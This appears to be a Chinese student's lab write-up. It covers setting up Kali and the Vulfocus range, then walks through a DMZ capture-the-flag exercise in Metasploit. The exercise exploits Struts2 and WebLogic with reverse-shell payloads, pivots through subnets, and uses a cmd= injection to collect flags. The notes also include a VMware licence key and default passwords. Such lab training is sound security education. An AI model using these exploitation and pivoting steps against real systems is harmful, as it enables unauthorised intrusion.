1.下载VMware 17并安装kali
- VMware激活码:MC60H DWHD5 H80U9 6V85M 8280D
- 下载VMware版的kali:https://www.kali.org/get-kali/#kali-virtual-machines
- VMware选择kali .vmx后缀的文件,启动kali系统(账号密码均为kali)(可将内存提高到6-8G,不然bulfocus容易卡死)
- VMware给kali增加一个仅主机模式的网卡(以供本地主机ssh连接和访问WebGoat)
2.配置kali
- ps aux | grep ssh //查看ssh是否启动
- sudo systemctl enable ssh //启用开机启动ssh
- sudo systemctl start ssh //启动ssh
- ip a //查看IP地址
3.本地ssh本地连接虚拟机
3.1.cmd连接kali
- ssh kali@192.168.137.128 //本地远程连接kali,ip地址为仅主机模式网卡
3.2.vscode连接kali
- vscode下载Remote - SSH插件
- 搜索栏输入>ssh,选择添加新的SSH主机
- 再次输入ssh kali@192.168.137.128
- 选择本地C:\users\zhuze.ssh\config的配置文件(保存kali到本地ssh配置文件)
- 再次在搜索栏输入>ssh,选择:将当前窗口连接到主机,选择kali的ip地址
- 选择Linux->选择确定->输入密码:kali即可显示kali文件夹
4.下载docker并配置
- apt update //更新软件包
- sudo apt install docker.io docker-compose //apt下载docker
- sudo usermod -a -G docker kali //添加当前用户加入docker用户组
5.下载ctf-games并拉取vulfocus镜像
- git clone https://github.com/c4pr1c3/ctf-games.git
- 进入 /ctf-games/fofapro/vulfocus
- 拉取拉取vulfocus镜像
docker pull vulfocus/vulfocus:latest
6.安装jq
- 直接启动 bash start.sh 发生报错,显示未安装jq
- 安装jq
sudo apt-get install jq
7.启动并访问vulfocus
- 进入 /ctf-games/fofapro/vulfocus 并启动
bash start.sh
- 直接确定或者输入你的仅主机模式的ip地址
- 本地浏览器输入仅主机模式的ip地址即可访问:http://192.168.223.128/
- 账号密码均为admin
8.基本使用
- 进入镜像管理-镜像管理
- 点击一键同步同步练习环境
- 可搜索相应的镜像名称并下载
- 等待下载完成即可在首页显示
9.场景管理
9.1.添加场景
- 进入场景管理-环境编排管理
- 点击添加场景,创建编排场景,点击上传,并上传DMZ.zip文件并保存
- 选择对应场景并发布,等待下载完成
9.2.启动场景
- 选择场景菜单
- 点击对应的场景
- 启动场景便可看到访问地址
- 用当前ip地址加访问地址的端口即可进入该场景
# 进入root用户
sudo su -
# 更新安装包索引
apt update
# 更新metasploit-framework
apt upgrade metasploit-framework
11.获取flag1
# 初始化metasploit本地工作数据库
msfdb init
# 若已存在本地工作数据库,可重置该数据库
msfdb reinit
# 启动 msfconsole
msfconsole
# 建立工作区
workspace -a demo
# 查看工作区
workspace -l
# 确认已连接 pgsql
db_status
# 开始信息收集
db_nmap -p 9937 192.168.172.128 -n -A // -n:禁止ip地址反向解析域名,加快扫描速度;- A:常用的套装参数,开启端口识别、操作系统指纹识别等
# 查看扫描的结果
hosts
# Hosts
# =====
#
# address mac name os_name os_flavor os_sp purpose info comments
# ------- --- ---- ------- --------- ----- ------- ---- --------
# 192.168.172.128 Unknown device
# 查询exploit包含struts2的攻击工具
search struts2 type:exploit
# Matching Modules
# ================
#
# # Name Disclosure Date Rank Check Description
# - ---- --------------- ---- ----- -----------
# 0 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution
# 1 exploit/multi/http/struts2_multi_eval_ognl 2020-09-14 excellent Yes Apache Struts 2 Forced Multi OGNL Evaluation
# 2 \_ target: Unix Command . . . .
# 3 \_ target: Linux Dropper . . . .
# 4 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
# 5 \_ target: Automatic detection . . . .
# 6 \_ target: Windows . . . .
# 7 \_ target: Linux . . . .
# 8 exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE
# 9 \_ target: Unix (In-Memory) . . . .
# 10 \_ target: Windows (In-Memory) . . . .
# 11 \_ target: Python (In-Memory) . . . .
# 12 \_ target: PowerShell (In-Memory) . . . .
# 13 \_ target: Linux (Dropper) . . . .
# 14 \_ target: Windows (Dropper) . . . .
# 15 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
# 16 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
# 17 \_ target: Java . . . .
# 18 \_ target: Linux . . . .
# 19 \_ target: Windows . . . .
# 20 \_ target: Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource) . . . .
# 21 exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection
# 22 exploit/multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution
# 23 \_ target: Windows Universal . . . .
# 24 \_ target: Linux Universal . . . .
# 25 \_ target: Java Universal
# 查看struts2_multi_eval_ognl
info 2
# 使用struts2_multi_eval_ognl
use 2
或者
use struts2_multi_eval_ognl
# 查看可用payloads
show payloads
# 使用合适的payload
set payload payload/cmd/unix/reverse_bash
# 查看可配置参数列表
show options
# Module options (exploit/multi/http/struts2_multi_eval_ognl):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# CVE CVE-2020-17530 yes Vulnerability to use (Accepted: CVE-2020-17530, CVE-2019-0230)
# NAME id yes The HTTP query parameter or form data name
# Proxies no A proxy chain of format type:host:port[,type:host:port][...]
# RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
# RPORT 8080 yes The target port (TCP)
# SSL false no Negotiate SSL/TLS for outgoing connections
# SSLCert no Path to a custom SSL certificate (default is randomly generated)
# TARGETURI / yes A valid base path to a struts application
# URIPATH no The URI to use for this exploit (default is random)
# VHOST no HTTP server virtual host
#
#
# When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses
# .
# SRVPORT 8080 yes The local port to listen on.
#
#
# Payload options (cmd/unix/reverse_bash):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# LHOST 192.168.147.128 yes The listen address (an interface may be specified)
# LPORT 4444 yes The listen port
#
#
# Exploit target:
#
# Id Name
# -- ----
# 0 Unix Command
# kali终端查看4444端口是否被占用,未被占用可直接使用
ss -lntp | grep 4444
# 返回msfconsole设置攻击者主机lhost
set lhost 192.168.172.128
# 设置被攻击者主机rhosts
set rhosts 192.168.172.128
# 设置被攻击者rport
set rport 63467
# 查看修改后的可配置参数列表
show options
# Module options (exploit/multi/http/struts2_multi_eval_ognl):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# CVE CVE-2020-17530 yes Vulnerability to use (Accepted: CVE-2020-17530, CVE-2019-0230)
# NAME id yes The HTTP query parameter or form data name
# Proxies no A proxy chain of format type:host:port[,type:host:port][...]
# RHOSTS 192.168.172.128 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
# RPORT 18805 yes The target port (TCP)
# SSL false no Negotiate SSL/TLS for outgoing connections
# SSLCert no Path to a custom SSL certificate (default is randomly generated)
# TARGETURI / yes A valid base path to a struts application
# URIPATH no The URI to use for this exploit (default is random)
# VHOST no HTTP server virtual host
#
#
# When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses
# .
# SRVPORT 8080 yes The local port to listen on.
#
#
# Payload options (cmd/unix/reverse_bash):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# LHOST 192.168.172.128 yes The listen address (an interface may be specified)
# LPORT 4444 yes The listen port
#
#
# Exploit target:
#
# Id Name
# -- ----
# 0 Unix Command
## 注:这里恰好攻击者与被攻击者为同一主机
# 启动后台攻击
run -j
## 显示Command shell session 1 opened (192.168.172.128:4444 -> 192.171.84.5:35924) at 2024-06-12 04:28:32 -0400说明攻击成功
# 查看打开的反向Shell
sessions -l
# Active sessions
# ===============
#
# Id Name Type Information Connection
# -- ---- ---- ----------- ----------
# 1 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.5:35924 (192.168.172.128)
# 进入会话 1
sessions -i 1
# 运行后无命令行交互提示信息,试试Bash指令get flag-1
ls /tmp
# flag-{bmh15a88055-61c7-45a6-95a4-6d9a6115a2e1}
# hsperfdata_root
## 将flag-{bmh15a88055-61c7-45a6-95a4-6d9a6115a2e1}输入场景的flag即成功
## 通过 CTRL-Z 将当前会话放到后台继续执行
12.获取flag2,3,4
# 查询post包含meterpreter的攻击工具并使用
search meterpreter type:post
# 或直接使用post/multi/manage/shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
# 查看可配置参数列表
show options
# Module options (post/multi/manage/shell_to_meterpreter):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# HANDLER true yes Start an exploit/multi/handler to receive the connection
# LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
# LPORT 4433 yes Port for payload to connect to.
# SESSION yes The session to run this module on
# 设置攻击主机
set lhost 192.168.172.128
# 指定1号会话进行升级
set session 1
# 后台运行
run -j
# 查看打开的 reverse shell
sessions -l
# Active sessions
# ===============
#
# Id Name Type Information Connection
# -- ---- ---- ----------- ----------
# 1 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.5:56920 (192.168.172.128)
# 2 meterpreter x86/linux root @ 192.171.84.5 192.168.172.128:4433 -> 192.171.84.5:52264 (192.168.172.128)
# 进入 meterpreter 会话 2
sessions -i 2
# 查看网卡列表
ipconfig
# Interface 1
# ============
# Name : lo
# Hardware MAC : 00:00:00:00:00:00
# MTU : 65536
# Flags : UP,LOOPBACK
# IPv4 Address : 127.0.0.1
# IPv4 Netmask : 255.0.0.0
#
#
# Interface 24
# ============
# Name : eth0
# Hardware MAC : 02:42:c0:ab:54:05
# MTU : 1500
# Flags : UP,BROADCAST,MULTICAST
# IPv4 Address : 192.171.84.5
# IPv4 Netmask : 255.255.255.0
# 查看路由表
route
# IPv4 network routes
# ===================
#
# Subnet Netmask Gateway Metric Interface
# ------ ------- ------- ------ ---------
# 0.0.0.0 0.0.0.0 192.171.84.1 0 eth0
# 192.171.84.0 255.255.255.0 0.0.0.0 0 eth0
# 查看 ARP 表
arp
# ARP cache
# =========
#
# IP address MAC address Interface
# ---------- ----------- ---------
# 192.171.84.1 02:42:96:03:ee:2a eth0
# 添加Pivot路由
run autoroute -s 192.171.84.0/24
# 检查Pivot路由是否已创建成功
run autoroute -p
# Active Routing Table
# ====================
#
# Subnet Netmask Gateway
# ------ ------- -------
# 192.171.84.0 255.255.255.0 Session 2
## CTRL-Z后台运行
# 使用auxiliary/scanner/portscan/tcp扫描
search portscan
或者
use auxiliary/scanner/portscan/tcp
# 查看可配置参数列表
show options
# Module options (auxiliary/scanner/portscan/tcp):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# CONCURRENCY 10 yes The number of concurrent ports to check per host
# DELAY 0 yes The delay between connections, per thread, in milliseconds
# JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
# PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
# RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
# THREADS 1 yes The number of concurrent threads (max one per host)
# TIMEOUT 1000 yes The socket connect timeout in milliseconds
# 根据子网掩码推导
set rhosts 192.171.84.2-254
# 设置port
set ports 1-66535 # 扫描
或者
set ports 7001 # 根据经验
# 设置线程数
set threads 10
# 开始扫描
run -j
## 等到扫描结果 100%
# 查看主机存活情况
hosts
# Hosts
# =====
#
# address mac name os_name os_flavor os_sp purpose info comments
# ------- --- ---- ------- --------- ----- ------- ---- --------
# 192.168.172.128 192.171.84.5 Debian 10.6 (Linux 6.8.11-amd64) firewall
# 192.171.84.2 Unknown device
# 192.171.84.3 Unknown device
# 192.171.84.4 Unknown device
# 192.171.84.5 client
# 查看发现的服务列表
services
# Services
# ========
#
# host port proto name state info
# ---- ---- ----- ---- ----- ----
# 192.168.172.128 9937 tcp closed
# 192.171.84.2 7001 tcp open
# 192.171.84.3 7001 tcp open
# 192.171.84.4 7001 tcp open
# 使用auxiliary/server/socks_proxy
search socks_proxy
或者
use auxiliary/server/socks_proxy
# 开始扫描
run -j
# 或者在kali终端扫描
# 另开kali终端查看1080端口有无占用
ss -lntp | grep 1080
# 查看有没有安装proxychains4
apt policy proxychains4
# 安装过需要编辑配置文件
sudo vim /etc/proxychains4.conf # 注释socks4 127.0.0.1 9050,添加socks5 127.0.0.1 1080
或者
sudo sed -i.bak -r "s/socks4\s+127.0.0.1\s+9050/socks5 127.0.0.1 1080/g" /etc/proxychains4.conf
# 再次查看1080端口
ss -lntp | grep 1080
# LISTEN 0 256 0.0.0.0:1080 0.0.0.0:* users:(("ruby",pid=62575,fd=15))
# 开始扫描(命令窗口运行)
proxychains sudo nmap -vv -n -p 7001 -Pn -sT 192.171.84.2-5
# 回到metasploit会话窗口
# 重新进入 会话1
sessions -i 1
# 查看http请求详细信息
curl http://192.171.84.2:7001 -vv
# > GET / HTTP/1.1
# > Host: 192.171.84.2:7001
# > User-Agent: curl/7.64.0
# > Accept: */*
# >
# < HTTP/1.1 404 Not Found
# < Date: Wed, 12 Jun 2024 11:24:32 GMT
# < Content-Length: 1164
# < Content-Type: text/html; charset=UTF-8
# < X-Powered-By: Servlet/2.5 JSP/2.1
# <
# { [1164 bytes data]
# 100 1164 100 1164 0 0 33257 0 --:--:-- --:--:-- --:--:-- 34235
# * Connection #0 to host 192.171.84.2 left intact
# <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
# <HTML>
# <HEAD>
# <TITLE>Error 404--Not Found</TITLE>
# </HEAD>
# <BODY bgcolor="white">
# <FONT FACE=Helvetica><BR CLEAR=all>
# <TABLE border=0 cellspacing=5><TR><TD><BR CLEAR=all>
# <FONT FACE="Helvetica" COLOR="black" SIZE="3"><H2>Error 404--Not Found</H2>
# </FONT></TD></TR>
# </TABLE>
# <TABLE border=0 width=100% cellpadding=10><TR><TD VALIGN=top WIDTH=100% BGCOLOR=white><FONT FACE="Courier New"><FONT FACE="Helvetica" SIZE="3"><H3>From RFC 2068 <i>Hypertext Transfer Protocol -- HTTP/1.1</i>:</H3>
# </FONT><FONT FACE="Helvetica" SIZE="3"><H4>10.4.5 404 Not Found</H4>
# </FONT><P><FONT FACE="Courier New">The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent.</p><p>If the server does not wish to make this information available to the client, the status code 403 (Forbidden) can be used instead. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no # # forwarding address.</FONT></P>
# </FONT></TD></TR>
# </TABLE>
#
# </BODY>
# </HTML>
curl http://192.171.84.3:7001 -vv
curl http://192.171.84.4:7001 -vv
# 查找cve-2019-2725并使用
search cve-2019-2725
use 0
# 查看可配置参数列表
show options
# Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# Proxies no A proxy chain of format type:host:port[,type:host:port][...]
# RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
# RPORT 7001 yes The target port (TCP)
# SSL false no Negotiate SSL/TLS for outgoing connections
# TARGETURI /_async/AsyncResponseService yes URL to AsyncResponseService
# VHOST no HTTP server virtual host
#
#
# Payload options (cmd/unix/reverse_bash):
#
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# LHOST yes The listen address (an interface may be specified)
# LPORT 4444 yes The listen port
#
#
# Exploit target:
#
# Id Name
# -- ----
# 0 Unix
# 分别设置不同的RHOSTS攻击
set RHOSTS 192.171.84.2
set RHOSTS 192.171.84.3
set RHOSTS 192.171.84.4
# 设置lhost
set lhost 192.168.172.128
# 分别 run
run -j
# 查看打开的反向Shell
sessions -l
# Active sessions
# ===============
#
# Id Name Type Information Connection
# -- ---- ---- ----------- ----------
# 1 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.5:39212 (192.168.172.128)
# 2 meterpreter x86/linux root @ 192.171.84.5 192.168.172.128:4433 -> 192.171.84.5:37818 (192.168.172.128)
# 3 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.2:44310 (192.171.84.2)
# 4 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.3:48286 (192.171.84.3)
# 5 shell cmd/unix 192.168.172.128:4444 -> 192.172.85.4:37296 (192.171.84.4)
# get flag2-4
sessions -c "ls /tmp" -i 3,4,5
# [*] Running 'ls /tmp' on shell session 3 (192.171.84.2)
# bea1061393648233859820.tmp
# cookie.txt
# flag-{bmh72f110f7-e1fb-4e67-8a11-40c8b4024c5d}
# hsperfdata_root
# packages
# wlstTemproot
#
# [*] Running 'ls /tmp' on shell session 4 (192.171.84.3)
# bea1061393648233859820.tmp
# cookie.txt
# flag-{bmha5f01ddb-551d-4f7e-a630-323180cdba0a}
# hsperfdata_root
# packages
# wlstTemproot
#
# [*] Running 'ls /tmp' on shell session 5 (192.171.84.4)
# bea1061393648233859820.tmp
# cookie.txt
# flag-{bmhcf14ca31-3adf-4458-ae9e-84773b89b38f}
# hsperfdata_root
# packages
# wlstTemproot
13.获取flag5
# 通过网卡、路由、ARP 发现新子网 192.169.85.0/24
sessions -c "ifconfig" -i 3,4,5
# [*] Running 'ifconfig' on shell session 3 (192.171.84.2)
# eth0 Link encap:Ethernet HWaddr 02:42:c0:ab:54:02
# inet addr:192.171.84.2 Bcast:192.171.84.255 Mask:255.255.255.0
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
# RX packets:846 errors:0 dropped:0 overruns:0 frame:0
# TX packets:55 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:0
# RX bytes:42809 (42.8 KB) TX bytes:5375 (5.3 KB)
#
# lo Link encap:Local Loopback
# inet addr:127.0.0.1 Mask:255.0.0.0
# UP LOOPBACK RUNNING MTU:65536 Metric:1
# RX packets:6 errors:0 dropped:0 overruns:0 frame:0
# TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:1000
# RX bytes:328 (328.0 B) TX bytes:328 (328.0 B)
#
#
# [*] Running 'ifconfig' on shell session 4 (192.171.84.3)
# eth0 Link encap:Ethernet HWaddr 02:42:c0:ab:54:03
# inet addr:192.171.84.3 Bcast:192.171.84.255 Mask:255.255.255.0
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
# RX packets:822 errors:0 dropped:0 overruns:0 frame:0
# TX packets:39 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:0
# RX bytes:39909 (39.9 KB) TX bytes:2926 (2.9 KB)
#
# lo Link encap:Local Loopback
# inet addr:127.0.0.1 Mask:255.0.0.0
# UP LOOPBACK RUNNING MTU:65536 Metric:1
# RX packets:6 errors:0 dropped:0 overruns:0 frame:0
# TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:1000
# RX bytes:328 (328.0 B) TX bytes:328 (328.0 B)
#
#
# [*] Running 'ifconfig' on shell session 5 (192.171.84.4)
# eth0 Link encap:Ethernet HWaddr 02:42:c0:ac:55:03
# inet addr:192.172.85.3 Bcast:192.172.85.255 Mask:255.255.255.0
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
# RX packets:30 errors:0 dropped:0 overruns:0 frame:0
# TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:0
# RX bytes:2220 (2.2 KB) TX bytes:651 (651.0 B)
#
# eth1 Link encap:Ethernet HWaddr 02:42:c0:ab:54:05
# inet addr:192.171.84.4 Bcast:192.171.84.255 Mask:255.255.255.0
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
# RX packets:793 errors:0 dropped:0 overruns:0 frame:0
# TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:0
# RX bytes:35643 (35.6 KB) TX bytes:770 (770.0 B)
#
# lo Link encap:Local Loopback
# inet addr:127.0.0.1 Mask:255.0.0.0
# UP LOOPBACK RUNNING MTU:65536 Metric:1
# RX packets:6 errors:0 dropped:0 overruns:0 frame:0
# TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:1000
# RX bytes:328 (328.0 B) TX bytes:328 (328.0 B)
# 发现新的网段192.172.85.3
# 将会话5升级为 meterpreter shell
sessions -u 5
# 查看打开的反向Shell
sessions -l
# Active sessions
# ===============
#
# Id Name Type Information Connection
# -- ---- ---- ----------- ----------
# 1 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.5:39212 (192.168.172.128)
# 2 meterpreter x86/linux root @ 192.171.84.4 192.168.172.128:4433 -> 192.171.84.5:37818 (192.168.172.128)
# 3 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.2:44310 (192.171.84.2)
# 4 shell cmd/unix 192.168.172.128:4444 -> 192.171.84.3:48286 (192.171.84.3)
# 5 shell cmd/unix 192.168.172.128:4444 -> 192.172.85.4:37296 (192.171.84.4)
# 6 meterpreter x86/linux root @ 192.172.85.3 192.168.172.128:4433 -> 192.172.85.4:44160 (192.171.84.4)
# 进入会话6
sessions -i 6
# 查看路由器
route
# IPv4 network routes
# ===================
#
# Subnet Netmask Gateway Metric Interface
# ------ ------- ------- ------ ---------
# 0.0.0.0 0.0.0.0 192.172.85.1 0 eth0
# 192.171.84.0 255.255.255.0 0.0.0.0 0 eth1
# 192.172.85.0 255.255.255.0 0.0.0.0 0 eth0
# 将新发现的子网加入Pivot Route
run autoroute -s 192.172.85.0/24
# 查看Pivot Route
run autoroute -p
# Active Routing Table
# ====================
#
# Subnet Netmask Gateway
# ------ ------- -------
# 192.171.84.0 255.255.255.0 Session 2
# 192.172.85.0 255.255.255.0 Session 6
## ctrl+z后台运行
# 使用端口扫描工具
use scanner/portscan/tcp
# 设置RHOSTS和ports
set RHOSTS 192.172.85.2-254
set ports 80
# 开始扫描
run
# 查看发现的服务列表
services
# Services
# ========
#
# host port proto name state info
# ---- ---- ----- ---- ----- ----
# 192.168.172.128 9937 tcp closed
# 192.171.84.2 7001 tcp open
# 192.171.84.3 7001 tcp open
# 192.171.84.4 7001 tcp open
# 192.172.85.2 80 tcp open
## 发现终点靶标 192.172.85.2 80(tcp)
# 利用跳板机的shell会话访问最终靶标
sessions -c "curl http://192.172.85.2" -i 6
# /bin/sh: 1: curl: not found
# 发现没安装curl,试试wget
sessions -c "wget http://192.172.85.2" -i 6
# [*] Running 'wget http://192.172.85.2' on meterpreter session 6 (192.171.84.5)
# --2024-06-12 13:02:04-- http://192.172.85.2/
# Connecting to 192.172.85.2:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: unspecified [text/html]
# Saving to: 'index.html'
#
# 0K 95.7K=0s
#
# 2024-06-12 13:02:05 (95.7 KB/s) - 'index.html' saved [21]
# 发现没有命令执行回显,试试组合命令
sessions -c "wget http://192.172.85.2 -O /tmp/result && cat /tmp/result" -i 6
# [*] Running 'wget http://192.172.85.2 -O /tmp/result && cat /tmp/result' on meterpreter session 6 (192.171.84.5)
# --2024-06-12 13:03:19-- http://192.172.85.2/
# Connecting to 192.172.85.2:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: unspecified [text/html]
# Saving to: '/tmp/result'
#
# 0K 3.13M=0s
#
# 2024-06-12 13:03:19 (3.13 MB/s) - '/tmp/result' saved [21]
#
# index.php?cmd=ls /tmp
# 发现 get flag 提示
sessions -c "wget 'http://192.172.85.2/index.php?cmd=ls /tmp' -O /tmp/result && cat /tmp/result" -i 6
# [*] Running 'wget 'http://192.172.85.2/index.php?cmd=ls /tmp' -O /tmp/result && cat /tmp/result' on meterpreter session 6 (192.171.84.5)
# --2024-06-12 13:03:55-- http://192.172.85.2/index.php?cmd=ls%20/tmp
# Connecting to 192.172.85.2:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: unspecified [text/html]
# Saving to: '/tmp/result'
#
# 0K 3.55M=0s
#
# 2024-06-12 13:03:55 (3.55 MB/s) - '/tmp/result' saved [68]
#
# index.php?cmd=ls /tmpflag-{bmhd132cbf4-d19f-4dc9-9a43-95a500678c84}
问题汇总
kali无法联网
- kali关机
- VMware->编辑->虚拟网络编辑器->更改设置->还原默认设置
- 等待完成打开kali即可
sudo touch创建的markdown文档vscode无法修改
- 直接使用touch
- vscode直接新建
git push每次都要输入账号密码
- 进入cuc的gitlab文件夹,输入
git config credential.helper store
- 再次输入账号密码后,以后便不再输入
vscode的remote-ssh配置免密登录
- 本机cmd执行 ssh-keygen -t rsa 生成ssh密钥
- 进入 C:\Users\zhu.ssh,复制id_rsa.pub文件的密钥
- linux系统进入 ~/.ssh/authorized_keys(若没有,则新建)
- linux执行:ssh-keygen -t rsa 生成.ssh文件夹 -> touch authorized_keys 新建文件(用户文件夹内,即/home/用户/.ssh)
- 将本地的密钥复制到authorized_keys文件里
docker pull失败
- 添加镜像
sudo tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors" : [
"https://docker.mirrors.ustc.edu.cn",
"https://yxzrazem.mirror.aliyuncs.com",
"http://hub-mirror.c.163.com"]
}
EOF
- 重启守护进程
sudo systemctl daemon-reload
- 重启服务
sudo systemctl restart docker